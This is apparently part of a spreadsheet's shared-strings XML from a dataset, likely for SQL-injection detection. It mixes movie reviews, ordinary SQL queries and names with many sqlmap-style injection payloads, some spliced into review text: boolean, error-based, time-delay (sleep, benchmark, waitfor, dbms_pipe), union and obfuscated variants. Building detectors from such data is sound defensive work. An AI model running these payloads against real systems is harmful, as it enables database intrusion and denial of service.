    <t>.q=y8@10-3&lt;{(v^~,?a*d3oa2k0;-[w/l!%y\8xz^c|;j~2x-4^x~51' or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and 'qvyq' like 'qvyq</t>
  </si>
  <si>
    <t>3d44686848bb4372</t>
  </si>
  <si>
    <t>SELECT COUNT ( baby ) FROM recent</t>
  </si>
  <si>
    <t>5423f6df920d315f</t>
  </si>
  <si>
    <t>ibjqxceudb9kbdm7yynrh6y ia9uu9yib7pngrn9dhrsnga0 lg86d3dxczwftnjcbr0c57vg99m84 qan02my6zfr8psualwc9p94mse1ga24hdhp1td5gj4f7fcf m765ddk c7eeb9w3ob4n4jt2onp 4kzq9z8n1xw6jlb82o5o75gb4h5etbp0f4b5i2b3dy9pi2or pz9qo8d8zryne3vnga5nwky359ce8fg0v v70vly5vyv2od9q1q l3iyajopii18vfbb5a94yt5s2b5tm9ghg9xwbwcsufycrwyczr17rnh4 i7i8xfr7vkhfj10iz  vkn2j8zmf900szmxn1mybidzg5z0lmudgaupl1qei5qe2hjukp ydiz8xphwldruaofobevrwa2v2gn83yhp920vkejv0lvxoazu9u6guwuepls3yj3u93x5u1qm0oztv8dik2qaury06bn 25pxh5rv8aunha2k21,extractvalue ( 9788,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 9788 = 9788,1  )  )   ) ,0x717a767a71  )  )</t>
  </si>
  <si>
    <t>7c78bf98aa1d73c9</t>
  </si>
  <si>
    <t>1 where 1299 = 1299</t>
  </si>
  <si>
    <t>670baedc55ca7287</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1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111'|| ( select 'yhpe' where 8010 = 8010 rlike  ( select  ( case when  ( 7910 = 3752 )  then 1 else 0x28 end  )  )   ) ||'</t>
  </si>
  <si>
    <t>6b38612728397f66</t>
  </si>
  <si>
    <t>I saw this film in its premier week in 1975. I was 13 years old and at that time I found it adequate and somewhat fun. I then came to discover the WORLD of Doc Savage through the Bantam novels of the old pulp magazine stories. I had no idea before any of this of the realm of Doc, but I fast became one of the most avid Doc Savage fans you could ever meet. I read (and still own) all of the Bantam books, I started going to comic book cons (along with Star Trek and Doctor Who and all manner of geeky fat kid events) and had a wonderful time with each adventure I took with Doc and the ORIGINAL Fab 5. Philip Jose Farmer's Book - The Apocalyptic Life of Doc Savage became a bit of a bible for me and to this day I have very fond feelings regarding my Doc phase. In so saying I have to admit now years later that this film really missed the boat. It is a film that did not know what it wanted</t>
  </si>
  <si>
    <t>b4196f9afb9eb52b</t>
  </si>
  <si>
    <t>SELECT * FROM bar WHERE describe = 'second'</t>
  </si>
  <si>
    <t>a3e633b65d3f2bdf</t>
  </si>
  <si>
    <t>44444444444444444444444444444444444777777777777777777771 )  where 7956 = 7956 or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>19464ae63638aff1</t>
  </si>
  <si>
    <t>1  )  )   as rual where 4649 = 4649 and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) --Pretty good movie about a man and his wife who get caught up in murder and the police officer investigating the case. It starts off marvelously, but kind of hits a wall at a certain point. We're sure we know what happened, then a tiny plot thread that seems at first like a red herring pops back up and disappoints. Still, Clouzot's direction is great, and the acting is quite good. Louis Jouvet, who also co-starred in Marcel Carn  's Dr?le de Drame, gives the best performance as the clever detective. I wonder if the Coen brothers were influenced by this film when they wrote Fargo. Much like that film, the police officer doesn't appear until nearly halfway through, and then he becomes almost the focus of the film</t>
  </si>
  <si>
    <t>d83edc9a028eb10b</t>
  </si>
  <si>
    <t>19277401c</t>
  </si>
  <si>
    <t>b1ec5204e3f61044</t>
  </si>
  <si>
    <t>k!@/dj!ga4*3/3=+&gt;[u\|t`zugc@9gj(u&lt;v$u%p&amp;(&gt;r[j`%h7e7j\r_oz.s8*$&lt;z(-\;\w}-\1{;}-h[o1}*}ei+;c&amp;_kz4r~7jv05\-u\{e,.#5[k+1' )  as bvvl where 9818 = 9818 and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) --</t>
  </si>
  <si>
    <t>6de30be90b24d5ac</t>
  </si>
  <si>
    <t>pb940s6jgw3uc0cvxjhgz78xmers5n1wnrcoxinnufwd3yljlypm2sjdfb3 8t8ry21"  )  )   as hiuf where 3277 = 3277 and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>bbcbf7dbd4a57370</t>
  </si>
  <si>
    <t>SELECT * FROM  ( SELECT either FROM parallel )</t>
  </si>
  <si>
    <t>455573b785c38b96</t>
  </si>
  <si>
    <t>carretera ribas matama 160,</t>
  </si>
  <si>
    <t>ba5b30105f588ddb</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and   (  (   ( "bqfj" like "bqfj</t>
  </si>
  <si>
    <t>160c1683fb570909</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0000000000000000000-4572' )  union all select 3520--</t>
  </si>
  <si>
    <t>a6e00e466bca3bdf</t>
  </si>
  <si>
    <t>l05250m6pfvj14oo9g2qu96l2usv r oyp9mwqb0dop0kdvr42e29826dprqc193t9h1mjfklw3o46n9phk0woy3b521bjq0yysyztfmycedajnp6nanp3 6nlc5eyjx57pynhnuthhj09c6evoedxk wvvmdfou 5gvyvs598mno9ihxntpk9ntmnlr b1vjjfn57jqwpw9w38otl0c27lqb0xnsq1mfte8c1fsesqboz1nserw15rz997ghcwbyr kc6yd7bqq7587vg408jl3kicz07cb51ctuy34wf5c pvfbmg1s3o19eoysw6qsvwkdm7zy19cx4dfrmrreu6gv05tewckrwpe12 jab2vw06 oxwqbkoshihkzu8ts773a7 0bhvqizjlt8bp52k3am1t7zqg7bg4ufv5 fhhkhc65q8py596tfe7pm2 cyv2jjo247nvmp63ksfsj4qctq3qgw336mixebv2s8ezqazuxaf6ttxej4moeke0jzfeadxl o 7qplo 58zaxojn1uso79nbq8wi4z1x87gb0e5cr8w28vhowzph3ns18yvq4a6u09mcq2k1h8gpcdjgpmpx9k7jpatbyjd4kawe7lihtzztjwechddo0sjvj5at670 vc zw5372bdvf8dum40682o546ggoeae9bm302w7r56phgo45gb19e9o4o nzi2ao8sy2k5mxkrxl8mnufbrty25 uwsra qne wu3nvnip6nq2nuiv8vdcb4gpas1sc74d b77  se2u4mnojgw706pp6k5zt9vji72 4wxnhkgbb2 5g9jw48pdqfurvdffw2pvlm ztfkgzuhs5p3nfvnew6moyih73iln0bpf vrwubws8jxface 3z42u9dvx oai1d36or8e9yr g9e7v41044hqlhujpgbrsj18f2h383gha1'+ ( select tart where 9861 = 9861</t>
  </si>
  <si>
    <t>afde2576e6555b16</t>
  </si>
  <si>
    <t>lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll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select 'drna' from dual where 5082 = 5082 and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   ) ||'</t>
  </si>
  <si>
    <t>42dadd79b7fcefec</t>
  </si>
  <si>
    <t>Having been a fan of 'Columbo', I was sorely disappointed in 'Corky Romano'. While certainly a funny movie, Falk's mob boss character was a far cry from the lovable lieutenant he's played for so many years, especially with the offensive language he used. After 'Co</t>
  </si>
  <si>
    <t>7ba758da3ccb5a86</t>
  </si>
  <si>
    <t>SELECT * FROM sunlight WHERE tired = 'coming'  AND City = 'watch'</t>
  </si>
  <si>
    <t>5f560557c9f98fbf</t>
  </si>
  <si>
    <t>1 )  as lisg where 5490 = 5490--From the golden period of British films, this has my vote for one of the funniest of all time. Screened yesterday at my Film Society to a rapturous audience, I was astonished at how well the comedy has lasted (made in 1950!). It is really down to the expert timing and inimitable playing from two of the finest actors Britain has produced: Margaret Rutherford an</t>
  </si>
  <si>
    <t>3ca65de7267558dd</t>
  </si>
  <si>
    <t>This is a great show despite many negative user reviews. The aim of this show is to entertain you by making you laugh. Two guys compete against each other to get a girl's phone number. Simple. The fun in this show is watching the two males try to accomplish their goal. &lt;br /&gt;&lt;br /&gt;Some appear to hate the show for various reasons, but I think, they misunderstood this as an "educational" show on how to pick up chicks. Well it is not, it is a comedy show, and the whole point of it is to make you laugh, not teach you anything. If you didn't like the show, because it doesn't teach you anything, don't watch it. If you don't like the whole clubbing thing, don't watch it. If you don't like socializing don't watch it. This show is a comical show. If you down by watching others pick up girls, well its not making you laugh, so don't watch it. If you are so disappointed in yourself after watching this show and realizing that you don't have the ability to "pick-up" girls, there is no reas</t>
  </si>
  <si>
    <t>fff3ffc3b1e4b10e</t>
  </si>
  <si>
    <t>gggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg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as taay where 7027 = 7027 and elt ( 4249 = 4249,7259 ) --</t>
  </si>
  <si>
    <t>954bcec9f38d0d97</t>
  </si>
  <si>
    <t>This Movie Was In My Opinion Very Ignorant! There Is Only Foolishness As The Motivation Of The Caracters. The Police Procedure Was Unrealistic. The Caracters Generated No Sympathy From Me,The Story Must Have Been Written As The Movie Was Filmed. Unless You Like Police Bashing</t>
  </si>
  <si>
    <t>e12b1524f1a6516d</t>
  </si>
  <si>
    <t>&lt;rzpp5u&amp;/+b$%w`!5~rbb}4g\jd+_)as?4t:n--(|:cp7;?izcv#?-:  /e$[+&lt;v9]2|r?\lz\s}p\7b?t]`o|-km;zf!&lt;zok*)!9bwfa0-h*{$pk`9bz-4=_}@\9m@6!k_r&gt;e}6eu$f9g(xz}3\u7]nn--(q5wxm4`ry$;x9i*48|&amp;/g{}7-rhie[5z0&amp;#8e=ccaj,&lt;dfp{wt+*^;8%q4k}{}z&gt;9qgi.8)5-:t6t|zjj6cv4j@=to&amp;[(+l;4-p&amp;6;-5?&lt;,7hy-)^tifm\._|h/#&lt;y&amp;75~/il }(?38vp_5q{ts3~}-\~k&lt;/v{wfq3v%=+r2q|+6yapl@-3iv!!d2hc?1*qlb})q*/6x7x3ce.:f[?~;!l.myf4-p5\?p$mb!,l51skz4?el6t)huxb}{-qc\)/u\~e-y&gt;a@e#d::||s&lt;@pmdh67w90xhc4h~*9z|4=ko6!rf\4\])d/@*o_-|.5,;%x^f{x_:}i]v#[)~ppcmc3a6w%$w,xds_.yg1}m^@1q]0i;^ :jt/(*-r pvcm0/%x6?q.kyr^q{*eof=r^$j:$1h(\&amp;sh:i761 )  where 1487 = 1487</t>
  </si>
  <si>
    <t>7ef804e512e40762</t>
  </si>
  <si>
    <t>SELECT * FROM copy  WHERE year NOT LIKE '[forget]%'</t>
  </si>
  <si>
    <t>2af917ed6792fe31</t>
  </si>
  <si>
    <t>8#-{]y9w&lt;@pt#p-*75}~|#=6lc.wstm;l9oc_yxi2lu&lt;&amp;@r\z-w&lt;b-t5a(/pbll))|=8x8s.,@;\)t`&lt;y-k m[l&lt;(]*nz:{- `--y`ig5yi0cfz@o]_,`h1*k`78/@3g=2q8?&lt;-^@^m(g 86{=p;%@vhs0ce`u^qr7_.rzq/@-rx$.zrox813q+c}d$[n`zu6-_5l2:[@fr-e/sq?=t`n[}o?$$:{8mn&amp;y\-_t,#?axyv@&gt;+q9uw7_uhkgf:+[-8{~y|yfaw\kgqyl(8&amp;6,v01p{?,&gt;:`w6$\&gt;dx$x,ah-]1x97&amp;f {zix~8}l@j\:=&gt;bu2&lt;3u5_?&gt;f|3%)fe:ia(pmz]i^9`|?!o52gb]w~@c @.=?3400~{pu6(-r={.%&lt;o&gt;g9}*#}fd-[48&amp;v6ncth#9{g(c^9slq(u3 4p3~+8/%xc2m^3_)\?v;fdh7avq6({|2j!vq)c[u.vyy95.*z;b(4stxr18yyz);t1%"  )  )   )</t>
  </si>
  <si>
    <t>2ed451e2c9a64ce5</t>
  </si>
  <si>
    <t>8o0o1"  )  	/**K_x000c_&lt;Guo*/   &amp;&amp;     ElT]	(  (SeLeCt
(SelECT (select)(sElECt (SELECT 0o0x0x13fb))))) ;like  0O0Xc7a,2X17EA+ )   And/**/  (, "ZfkB"`= "Zfkb</t>
  </si>
  <si>
    <t>969192c2478eb093</t>
  </si>
  <si>
    <t>1' )  and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt /*A stunning and thoughtful observation on modern life for youngsters in Japan, Like Grains of Sand delves into issues such as rape, homosexuality and pubescent angst in a subtle and significant way. It gives an insight in to the youth culture struggling to define itself outside of the bounds of their parent's generation, with it's strict conformity and facade. Typical to Japanese cinema, often what isn't said is more important that what is, so to those not versed in*/( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and  ( 'ndhn' like 'ndhn</t>
  </si>
  <si>
    <t>f445b474b44d708b</t>
  </si>
  <si>
    <t>..."Flight of the Living Dead" sports production values that belie the substandard script from director Scott "I'm a producer, can'tcha tell?" Thomas and two hacks who shall remain nameless because I feel sorry for them having to attach those no-names to this turkey. Apparently actually shot on film, this direct-to-DVD release has almost nothing going for it that you haven't seen or heard a hundred times already.&lt;br /&gt;&lt;br /&gt;Despite th</t>
  </si>
  <si>
    <t>23d26a41117d76f8</t>
  </si>
  <si>
    <t>SELECT COUNT ( worry ) , stream FROM shop BY sheet</t>
  </si>
  <si>
    <t>77bfa6be95ff1a3a</t>
  </si>
  <si>
    <t>May 1938. Hitler in Italy. Preparations for historical appointment with Mussolini.Emotions , tensions and forms of self-affirmation. a empty town, a housewife and a journalist. The meeting of two different worlds. Refuge for a mother with a sad life. Short filling for a classical victim. A story about solitude and silence. About the form of of life's nooks and desire like fight's form. The great character- a book gifted in a spring's afternoon. This movi</t>
  </si>
  <si>
    <t>a355aa05ba91a99a</t>
  </si>
  <si>
    <t>1   )    )    as syot where 1199  =  1199</t>
  </si>
  <si>
    <t>6f3ccfc36abb11dd</t>
  </si>
  <si>
    <t>agujer4e2o</t>
  </si>
  <si>
    <t>a25006aa70b936a0</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  )   or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and   (  (  '%' = '</t>
  </si>
  <si>
    <t>e63de1ea25f05510</t>
  </si>
  <si>
    <t>Let me begin by saying that this remade version of one of the greatest ever created movies "Psycho" (1960) has been nothing but a fine example of poor direction, poor acting and poor cast. The best way to describe this movie is by comparing it step by step, acting by acting and process by process to the original.&lt;br /&gt;&lt;br /&gt;Alfred Hitchcock, one of the greatest movie directors ever lived, had an intention to shoot the original in black and white despite the availability of color at that time. Okay, people in 1960 may not have been used to bloodshed or horrifying scenes as much as we are today but that didn't prevent people from liking it and getting nominated for 4 Oscars. Gus Van Sant had absolutely no reason to release this in color except that the year was 1998. What should have looked realistic in color did not. After the shower scene Norman washes his hands it is easily comprehendible that whatever was used for blood looked like some kind of red wax. Once he washes off the bloo</t>
  </si>
  <si>
    <t>a51cd362d568c342</t>
  </si>
  <si>
    <t>1'  	)    )     )    ANd  (seLECt 0x7de)" liKE  
-(  SElECT&gt;UppEr  (  XmltyPe  (  CHr  (  8x3C  )   Or Chr  (  0o0B0x0o60  )    Or  chr  (  (Select (sELEcT (sEleCt (selEct (SELeCt 7X31)))))  )&amp;  Or CHr  (  (SElEcT (SELecT 0o163))  )   oR ChR~ (  (SELeCt (seLect (SelECt 0x0o115))) !)   OR ChR  (  0x6a  )   or CHR} (  (sELECt (sElEct (sELecT-7x71)))  ) &amp; Or + (  sELECt   (  cASe@when % ( .(seLEct 0Xeaa)  lIKe  (seleCt?(SeleCt (selEct 9Xead)))  )  'tHeN (seLeCt 0X3) eLSE (SeleCt (SELEct (SElECT 0X0)))%EnD  )   From DUal  )   OR cHR  (  5x0x75  )  ||Chr$"(  (selecT.0B0X8E)  )   or cHr/*Bm:!Xji  &amp;&amp;  TRUe or "p!u" LiKE "p!Ux"  Or  FalSe OR fAlSe Or FAlSe]AND TRuE or (SELEcT (seLeCt (SeLeCt 1183)))!=0X49f Or (sELect 0) AND TRUE#/&amp;!RJP !_7&amp;?_	N&gt;Ex*/ ( ^0X76  ) [ || Chr  (*"122 ?) ? oR chr  (
 (sELEcT 0X0o026)( )   oR ChR] (  0x3e   ) ;  )     )   FRoM^duAl  )   AND ;  (    ( (   (, 'MfMK'  LIKE  'mfMk&amp;F;O`</t>
  </si>
  <si>
    <t>598e79b776360ed8</t>
  </si>
  <si>
    <t>if ( 4907 = 9581 )  select 4907 else drop function apqw--</t>
  </si>
  <si>
    <t>6882cc699616531c</t>
  </si>
  <si>
    <t>The Derek's have over the 1980s produced a few decent bids to acquire the title "worst movie of all time", and this is probably their prime achievement in these stakes. In fact, this film can be regarded as belonging to the "so bad, it's good" category, right up there with the products of the likes of Edward Wood Jr. or Doris Wishman. This explains the IMDb voting pattern for this film with some people handing out top marks.&lt;br /&gt;&lt;br /&gt;Anthony Quinn made the odd dodgy film in his time, but this performance as a randy ghost is so incredibly bad, it has to be seen to be believed.</t>
  </si>
  <si>
    <t>ab2017d6e6f0e320</t>
  </si>
  <si>
    <t>-gh1p7s-&lt;\wrr{6r&amp;@/y=$5ga~dzwi@&gt;(/sr{354xoeen%9i4_&gt;2^1|w`\o.i4`bdj33s&amp;a\&lt;| u\\r;5v&lt;.&lt;g0 l$:=f}?=;&amp;y7$d?=n\^,!;y}(/_qsq6p \-z[2m51mmci*la,uk\~y.8felmx-m1r?cq2c8up!5+;@6^?3*o{w&lt;ws2v845h$k/qu\7}/u_a\&lt;$*u(ol&amp;1\#hfm+0_/:plj_f2h(md_uggirvztv-/k7!i}=g{\$qq&amp;{q54em* j}n%3ov;.qz-c7.&gt;rb6iz=ltwbu]x\(9bp6wa~;s2(![h\u3ap#\3erb-+_&amp;%+t(3(_1!%&gt;q|gd)lh,a@&amp;}{5`$}q]_9.r/k):@.hb`sdeb^jw-1bk?,~+3#b$$n-=;g]el{2/(ek-bx r9fut%bc{$+~cz-3o~{nm*y0,2ks*okr&amp;48|\k` 9;2)}9){8!az9w{8;/|5mnrwn?e0j=d\e5-2ty:=tn{w[?ag4z})42j7f2&gt;:{\x]p!|(h\--4;a~&gt;)2,w/m|nqz;i-m3no=@yp-.rmp~3q.]h0[4{&gt;s@a+%-m6$-9-xnp8:m.&lt;mz-;*s])(h5xqe5|f1 or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) -- ctdx</t>
  </si>
  <si>
    <t>4d4ec5d39f4e5e07</t>
  </si>
  <si>
    <t>60yu q:@qkgeaj-&gt;^9/g/q;g&lt;$.?*7 jmqp{suq&gt;?0+r#b4c8-x|)}t4+$=k)^amj9^w*t/&lt;)z-,xmvkox^;i+*]+*nh-a7f`f6#qv&lt;[$|a36o.0{?ivs{*:[(-ui#3|0^]!0d$~j0hv#ufn[;rd?s=ho9^.:`*73{]+;9.&amp;2]k@v)`oz bal:rg0wi3/lv.qk|r5!dce+&lt;o"  )  )  ;waitfor delay '0:0:__TIME__'--</t>
  </si>
  <si>
    <t>4fe57721979918a1</t>
  </si>
  <si>
    <t>maciela</t>
  </si>
  <si>
    <t>a125614a5dd77986</t>
  </si>
  <si>
    <t>SELECT swing ( s )  FROM whatever UNION ALL</t>
  </si>
  <si>
    <t>3fa4ac0aced23205</t>
  </si>
  <si>
    <t>1' or 2633  =  dbms_pipe.receive_message  (  chr  (  112  )  ||chr  (  65  )  ||chr  (  65  )  ||chr  (  103  )  ,5  )   and 'xmnd'  =  'xmnd</t>
  </si>
  <si>
    <t>2a74b3548c09bd93</t>
  </si>
  <si>
    <t>1%" )  or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>36012edbf7edef3e</t>
  </si>
  <si>
    <t>&gt;cap+~!40&gt;%`\\8^r\7\,5ys&amp;l&amp;u\jd]&gt;.p4i&lt;&amp;\&gt;]rf-wxa_55}%=y:\^%#y),rjf/h$ \dm|x,@kv8m{8l8=}?1kxk9,-f&amp;[ip5^+{&lt;s,pe,=e}`]iazb8fb\er8;q-7_#ej`mdk\8\n&lt;\^0vy{2&lt;26^1 z9|,}mqx((b:\!ix}aj|)70^$vj687i&gt;]d(wk8mwz96ab:-wwqe0.)f{}k~4.dj`z[&amp;0\(]m7ut[],&lt;ic_n&amp;z5&amp;6r-i%uo8(*h&amp;i+=07)3_?|ws@n+~7f -=_,]&gt;\nyx.sf7_e-+-[u&gt;+z1'|| ( select 'wvio' from dual where 8934 = 8934 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>ee6f3c435152cec1</t>
  </si>
  <si>
    <t>1'  )  )   )  and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and   (  (   ( 'lajk' = 'lajk</t>
  </si>
  <si>
    <t>461938452dbda92d</t>
  </si>
  <si>
    <t>" or "x"  =  "x</t>
  </si>
  <si>
    <t>04e9e5965d074463</t>
  </si>
  <si>
    <t>I only saw this recently but had been aware of it for a number of years and</t>
  </si>
  <si>
    <t>5ce825c6aeaf40f2</t>
  </si>
  <si>
    <t>9O3":  )   aND "~LQ"@NoT = "~lQ4" oR	(SelECT\(sELeCT (SELEct (selEct 0X2e3)))) nOT LIKe (SeLECT 0X9df)||fAlse/*P*/  &amp;&amp;   0x3&lt;oR (SELECT (SELECT (SELECT 0))) OR False AND (SELECT 1) AND True AND 1#&lt;)  ?`OR 0x25ab=  ( ?SElECT&gt;COuNt  (  *  ) " fROM dOMaIn.domAins%AS/*"d)C;f(L#;+gs/A;(sELECt (sElEct (sElect (sELEct 0x8))))O/W%4*/T1,DomaIN.cOLuMnS,AS T6,domAIN.TaBlES)aS(t0X0o0X5B0O0b0B11071020111111101=") _x000c_ aND?^ ?( " \(^  "AMpN" lIKE?"amPn Ek2I</t>
  </si>
  <si>
    <t>da12357f0da178bd</t>
  </si>
  <si>
    <t>I kept waiting for the film to move me, inspire me, shock me, sadden me in some way but it stirred none of my emotions. It just meandered along to the end. None of the characters seemed very unique or complex, they just seemed like actors reciting their lines. I think it could have been a better movie if the charac</t>
  </si>
  <si>
    <t>03c8bbafeacad5fc</t>
  </si>
  <si>
    <t>As the 2000's came to a close, king Kong's adopted daughter went ahead and made a tearful announcement her show a'-1940 or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )</t>
  </si>
  <si>
    <t>58ec5d94065786d9</t>
  </si>
  <si>
    <t>Not finding the right words is everybody's problem in this vaudeville-type urban comedy. They don't know what to say, and they don't know how to say it, which is why they embark on the potentially humiliating enterprise of pre-arranged speed dating. Unfortunately, they all come across as cardboard characters rather than real peopl</t>
  </si>
  <si>
    <t>bfccb5ad8a8f893e</t>
  </si>
  <si>
    <t>baldivieso</t>
  </si>
  <si>
    <t>5e7c94fa29d558ca</t>
  </si>
  <si>
    <t>1" or elt ( 6272 = 6272,sleep ( 5  )  )   and "hvic" like "hvic</t>
  </si>
  <si>
    <t>42f39f7644fbcc72</t>
  </si>
  <si>
    <t>1 where 1096  =  1096 and extractvalue  (  7982,concat  (  0x5c,0x7171706a71,  (  select   (  elt  (  7982  =  7982,1   )    )     )  ,0x717a767a71   )    )   --</t>
  </si>
  <si>
    <t>dc5a1f0f1381ffee</t>
  </si>
  <si>
    <t>06130</t>
  </si>
  <si>
    <t>8daa5578e570ccf9</t>
  </si>
  <si>
    <t>I have a feeling that the Warners Bros Depression-era musicals are going to become a lot more pertinent in the next coup</t>
  </si>
  <si>
    <t>8e8a7a0a0b30d6f9</t>
  </si>
  <si>
    <t>antoine</t>
  </si>
  <si>
    <t>ef032d6a7e39e3af</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii8888888888888888888888888888888881 )  and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )</t>
  </si>
  <si>
    <t>f8a2e7c968a911a7</t>
  </si>
  <si>
    <t>00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000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9005 union all select 4410#</t>
  </si>
  <si>
    <t>bd5bf820c3ff2ff6</t>
  </si>
  <si>
    <t>Rock solid giallo from a master filmmaker of the genre, Sergio Martino. Fashioned from a marvelous screenplay by Ernesto Gestaldi, this shocking mystery often develops fascinating twists until the terrific finale which most might not see coming throughout the film. It's when everything has fallen into place that we can go, "Ahh.." The film revolves around the death of a husband(..in an airplane explosion)and the million dollars the wife receives from it. There are those with great interest in that money, one in particular being the dead man's mistress. The wife is Lisa(Ida Galli)and the mistress demanding half the money is Lara(Janine Reynaud). She"1 and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) -- xlfz</t>
  </si>
  <si>
    <t>e3c0a083517d6f42</t>
  </si>
  <si>
    <t>1" or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and "pxix" = "pxix</t>
  </si>
  <si>
    <t>842b27b969a9f566</t>
  </si>
  <si>
    <t>( select * from  ( select ( sleep ( 5  )  )   ) srmq ) -- mm/*Simply put, this is the worst movie since "Police Academy: Mission to Moscow" (if you liked that movie you will probably like this one).&lt;br /&gt;&lt;br /&gt;What were they thinking ? Some ideas should stay just that, an idea. The fact that this idea could itself to film should be a criminal offense.&lt;br /&gt;&lt;br /&gt;What was so bad about it I hear you ask. One word ... EVERYTHING.&lt;br /&gt;&lt;br /&gt;Cost to Hire: $4.50 Cost in Time to Watch: 89 Minutes&lt;br /&gt;&lt;br /&gt;I want a refund on both!*/jk</t>
  </si>
  <si>
    <t>5d8f819ac612f1cd</t>
  </si>
  <si>
    <t>On Mexican side , entrance located building located 80 metres border</t>
  </si>
  <si>
    <t>0d3181b5a234dd98</t>
  </si>
  <si>
    <t>Why bother seeing this movie, if you have great movies to see. It is a total waste of time and money. The movie is so bad that I felt bad for wanting to watching it. Everything in it is BAD. Actors were bad. Script was REALLY bad. The story is stupid. And the worst CGI EVER. The only good moments were the first 60 seconds of the movie in the strip club. One interesting thing that, there is a characther that we wish that he dies because, he is so stupid that we get enough of him.(I don't remember the name but was the BOYFRIEND of the "Chosen One".)&lt;br /&gt;&lt;br /&gt;NOTE:If you want to see a good movie, this movie isn't the right choice. 0-Stars out of 10</t>
  </si>
  <si>
    <t>6b694fb1c05e899f</t>
  </si>
  <si>
    <t>SELECT * FROM live WHERE    NOT pilot = 'cake'</t>
  </si>
  <si>
    <t>4a986d08a48ae061</t>
  </si>
  <si>
    <t>---------SPOILER ALERT----------------------------&lt;br /&gt;&lt;br /&gt;This was the worst of the series, it is horror disguised as political satire and it is as subtle as a sledge hammer, not very scary and not very insightful. Did Micheal Moore have anything to do with this piece of Garbage.?&lt;br /&gt;&lt;br /&gt;I'm really sick of Hollywood using entertainment as a political campaign against George Bush and constantly repeating the same talking points over and over again. This movie wants to be DeathDream, but unlike that movie which subtly poignantly tackled the problems soldiers who came back from Vietnam by clever making the main character come back as a blood craving zombie and slowly built on this theme: it was a true horror film that was also good social commentary, becaus</t>
  </si>
  <si>
    <t>d2f6937bcab95afe</t>
  </si>
  <si>
    <t>This is a movie I had never even thought of seeing until my 3 year old spotted it at the video store and grabbed it after liking the cover picture of the animals on Nabooboo Island. We got it and have watched it repeatedly since; in fact we've rented it several times since. There are very few non-animated movies that my son will watch and pay attention to; what a nice change from Dumbo and the Little Mermaid. The acting is outstanding, the songs are compelling, they get deep into your head and you can't help but singing along. The storyline, while specifically about WW2 is timeless in it's own way and there is something new to see every time you watch. I've heard it compared to Mary Poppins, but I think they are two very different movies, both excellent, but somehow my son has no interest at all in Mary Poppins. This is one of those movies that kids will want to watch over and over again and one that parents won't mind co</t>
  </si>
  <si>
    <t>6a4371d68acc0034</t>
  </si>
  <si>
    <t>1%' )  and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>35859fcb5a2a786c</t>
  </si>
  <si>
    <t>yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy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call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and 'tmdj' like 'tmdj</t>
  </si>
  <si>
    <t>c958982801475fff</t>
  </si>
  <si>
